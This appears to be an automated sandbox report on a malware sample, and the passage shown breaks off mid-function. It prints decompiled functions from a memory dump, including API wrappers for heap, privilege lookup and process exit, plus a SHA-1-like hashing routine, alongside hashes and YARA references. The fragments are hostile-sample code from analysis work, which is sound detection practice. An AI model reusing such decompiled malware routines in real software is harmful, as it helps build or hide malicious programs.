Opcode Fuzzy Hash: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
Instruction Fuzzy Hash: 4F210CB2D4020857CB25D665AD42BEF737CAB54318F04017FE949A3182F638BE49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082B3, Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d843e9d9da8ff99601aefd49783d6cd7f47bcc84f95d19af045ba0260295a773
Instruction ID: 8bcaff4381f14c47488935c9ca27d818242cce1b5036adb9122b0b8a84e3eb89
Opcode Fuzzy Hash: d843e9d9da8ff99601aefd49783d6cd7f47bcc84f95d19af045ba0260295a773
Instruction Fuzzy Hash: 8F01D33574031835E52062743C03FFA730C9B40F15F19006FFF44F92C1E6A9951541EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr _t23;
				intOrPtr* _t24;
				void* _t25;
				void* _t29;

				_t29 = __eflags;
				_v68 = 0;
				E0041BA30( &_v67, 0, 0x3f);
				E0041C5D0( &_v68, 3);
				_t23 = _a4;
				_push(_t25);
				asm("rcl byte [edx-0x7d], 0xc6");
				asm("sbb al, 0x56"); // executed
				_t12 = E0040ACD0(_t29); // executed
				_t13 = E00414E20(_t23, _t12, 0, 0, 0xc4e7b6d6);
				_t24 = _t13;
				if(_t24 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t31 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t24(_t21, 0x8003, _t25 + (E0040A460(_t31, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x00408313
0x00408317
0x00408318
0x0040831c
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
Instruction ID: 1050077c77294267169ebb916dfae3a1405fb9879d8789690f6f999e3cf74240
Opcode Fuzzy Hash: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
Instruction Fuzzy Hash: AD01D831A8032877E720A6959C03FFE771C6B40F54F044019FF04BA1C1E6A8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A232, Relevance: 1.5, APIs: 1, Instructions: 25
memoryCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E0041A232(void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t15;
				void* _t21;
				void* _t24;

				asm("cmc");
				asm("sti");
				asm("insb");
				asm("loopne 0xffffffd8");
				_t24 = ss;
				_t12 = _a4;
				_push(_t24);
				_t6 = _t12 + 0xc74; // 0xc74
				E0041AB30(_t21, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t15;
			}

0x0041a235
0x0041a239
0x0041a23a
0x0041a23d
0x0041a23f
0x0041a243
0x0041a249
0x0041a24f
0x0041a257
0x0041a26d
0x0041a271

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A22D

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2994d8381dabf6c2e904fd7dcc6bfb4240328fbb67fd187bb4bda2fcc701afb9
Instruction ID: e22fc173495088458bd748ee23f2dd1d97c65a256694f9b551007737d68342a2
Opcode Fuzzy Hash: 2994d8381dabf6c2e904fd7dcc6bfb4240328fbb67fd187bb4bda2fcc701afb9
Instruction Fuzzy Hash: D7D012B92412155FDB14EE599C40DDB7769AFC4295714D54AFC1C87301C235D86286F1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A240, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A240(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AB30(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a24f
0x0041a257
0x0041a26d
0x0041a271

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 8b4701b4f03220052e2b3b5ed4c672ef58e2eb60ff823c8fb6afa074398e137c
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DCE04FB12102046BD714DF59CC45EE777ADEF88750F014559FE0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A200, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A200(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AB30(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a217
0x0041a22d
0x0041a231

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A22D

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 4224f920e4464a65d08b1d76aaa125f94db740d8927d38e6c7d6b62f4195d12c
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 58E012B1210208ABDB14EF99CC41EA777ADAF88664F118559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3A0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A3A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AB30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a3ba
0x0041a3d0
0x0041a3d4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 9e479b2eaf60326b59b5a15a73b63e8f9b290ab663b6f1255dfa49a1ae2fc0e3
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: DFE01AB12002086BDB10DF49CC85EE737ADAF88650F018155BA0857241C934F8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A280, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A280(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AB30(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a283
0x0041a29a
0x0041a2a8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: ec4c192c261470033b7d3fff11050ba2ce0bed15fbfecc5592b4580303735d53
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 29D017726142187BD620EB99CC85FD777ACDF487A0F0181A9BA1C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0145967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01459694

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88bb45e7614d21acd51da27af976991c2a294defad2c4887a2bfd009b506f306
Instruction ID: e5e253baeb12525dde2dbbbf2885a3ae56325cda8349ec66a744d5e7f8c762a0
Opcode Fuzzy Hash: 88bb45e7614d21acd51da27af976991c2a294defad2c4887a2bfd009b506f306
Instruction Fuzzy Hash: 8CB09B71D014C5C5D751D7A54608717794477D0745F16C053D1460652F4778C095F5B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00409E40, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00409E40(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

0x00409e4b
0x00409e4f
0x00409e51
0x00409e51
0x00409e54
0x00409e76
0x00409e9c
0x00409ec2
0x00409ee4
0x00409eeb
0x00409eee
0x00409ef1
0x00409efa
0x00409f00
0x00409f07
0x00409f18
0x00409f1b
0x00409f1e
0x00409f22
0x00409f24
0x00409f26
0x00409f2f
0x00409f32
0x00409f35
0x00409f40
0x00409f46
0x00409f48
0x00409f48
0x00409f4b
0x00409f4e
0x00409f4e
0x00409f53
0x00409f55
0x00409f58
0x00409f5b
0x00409f61
0x00409f64
0x00409f67
0x00409f70
0x00409f76
0x00409f7f
0x00409f8e
0x00409f95
0x00409f98
0x00409f9b
0x00409fa4
0x00409fa7
0x00409faa
0x00409fc2
0x00409fc9
0x00409fcb
0x00409fce
0x00409fd1
0x00409fda
0x00409fe1
0x00409fe4
0x00409fe7
0x00409ff6
0x00409ffd
0x0040a000
0x0040a003
0x0040a00c
0x0040a016
0x0040a019
0x0040a025
0x0040a028
0x0040a02f
0x0040a032
0x0040a035
0x0040a03a
0x0040a03d
0x0040a046
0x0040a057
0x0040a05a
0x0040a05d
0x0040a064
0x0040a067
0x0040a06a
0x0040a06d
0x0040a06f
0x0040a072
0x0040a075
0x0040a07e
0x0040a083
0x0040a083
0x0040a098
0x0040a09b
0x0040a09e
0x0040a0a5
0x0040a0a8
0x0040a0ab
0x0040a0c0
0x0040a0c7
0x0040a0ca
0x0040a0ce
0x0040a0d1
0x0040a0d6
0x0040a0d9
0x0040a0e8
0x0040a0eb
0x0040a0f2
0x0040a0f5
0x0040a0f8
0x0040a0fb
0x0040a0fe
0x0040a106
0x0040a114
0x0040a117
0x0040a11a
0x0040a11a
0x0040a121
0x0040a124
0x0040a127
0x0040a12f
0x0040a13d
0x0040a140
0x0040a147
0x0040a14a
0x0040a14d
0x0040a150
0x0040a153
0x0040a15c
0x0040a163
0x0040a163
0x0040a169
0x0040a182
0x0040a185
0x0040a18c
0x0040a18f
0x0040a192
0x0040a1a4
0x0040a1ae
0x0040a1b1
0x0040a1ba
0x0040a1bd
0x0040a1c4
0x0040a1c7
0x0040a1cd
0x0040a1e0
0x0040a1e7
0x0040a1ea
0x0040a1ed
0x0040a1f0
0x0040a1f9
0x0040a1fc
0x0040a20f
0x0040a212
0x0040a21c
0x0040a21f
0x0040a221
0x0040a22a
0x0040a22d
0x0040a240
0x0040a246
0x0040a249
0x0040a250
0x0040a252
0x0040a255
0x0040a258
0x0040a25b
0x0040a25e
0x0040a261
0x0040a26a
0x0040a26f
0x0040a272
0x0040a272
0x0040a285
0x0040a288
0x0040a28b
0x0040a292
0x0040a295
0x0040a298
0x0040a29b
0x0040a2ae
0x0040a2b1
0x0040a2bc
0x0040a2bf
0x0040a2cb
0x0040a2ce
0x0040a2d4
0x0040a2d7
0x0040a2da
0x0040a2e1
0x0040a2f1
0x0040a2f4
0x0040a2fa
0x0040a2fd
0x0040a304
0x0040a306
0x0040a309
0x0040a30c
0x0040a30f
0x0040a312
0x0040a319
0x0040a328
0x0040a32b
0x0040a332
0x0040a335
0x0040a338
0x0040a33b
0x0040a33e
0x0040a341
0x0040a344
0x0040a34d
0x0040a35e
0x0040a366
0x0040a36c
0x0040a36f
0x0040a371
0x0040a374
0x0040a377
0x0040a384

Strings

(, xrefs: 0040A15C

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: 761c4a68b585b28a38f9816625c1c2cc86ae2b6e7acc08c6d3f539b6cea400a7
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 6C022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 00409E3C, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00409E3C(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t319;
				signed int _t321;
				signed int _t324;
				signed int _t326;
				signed int _t335;
				signed int _t341;
				signed int _t342;
				signed int _t347;
				signed int _t355;
				signed int _t359;
				signed int _t360;
				signed int _t364;
				signed int _t367;
				signed int _t371;
				signed int _t372;
				signed int _t402;
				signed int _t407;
				signed int _t413;
				signed int _t416;
				signed int _t423;
				signed int _t426;
				signed int _t435;
				signed int _t437;
				signed int _t440;
				signed int _t448;
				signed int _t463;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t474;
				signed int _t482;
				signed int _t483;
				signed int* _t484;
				signed int* _t487;
				signed int _t494;
				signed int _t497;
				signed int _t502;
				signed int _t505;
				signed int _t508;
				signed int _t511;
				signed int _t512;
				signed int _t516;
				signed int _t528;
				signed int _t531;
				signed int _t538;
				void* _t544;
				void* _t546;

				_t544 = _t546;
				_t487 = _a4;
				_t355 = 0;
				_t2 =  &(_t487[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t544 + _t355 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t544 + _t355 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t544 + _t355 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t544 + _t355 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t355 = _t355 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t355 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t402 =  *(_t278 - 0x18);
					_t463 =  *(_t278 - 0x14);
					_t359 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t402;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t463;
					_t278[8] = _t359;
					_t319 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t319 ^ _t402;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t359 ^ _t463;
				} while ( *_t46 != 0);
				_t321 =  *_t487;
				_t279 = _t487[1];
				_t360 = _t487[2];
				_t407 = _t487[3];
				_v12 = _t321;
				_v16 = _t487[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t466 = _v8;
					_t494 = _t321 + ( !_t279 & _t407 | _t360 & _t279) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t324 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t407;
					_v12 = _t494;
					asm("rol esi, 0x5");
					_v8 = _t360;
					_t413 = _t494 + ( !_t324 & _t360 | _t279 & _t324) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t497 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t364 = _v12;
					_v8 = _t324;
					_t326 = _v8;
					_v12 = _t413;
					asm("rol edx, 0x5");
					_t285 = _t413 + ( !_t364 & _t497 | _t324 & _t364) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t416 = _v12;
					_v16 = _t497;
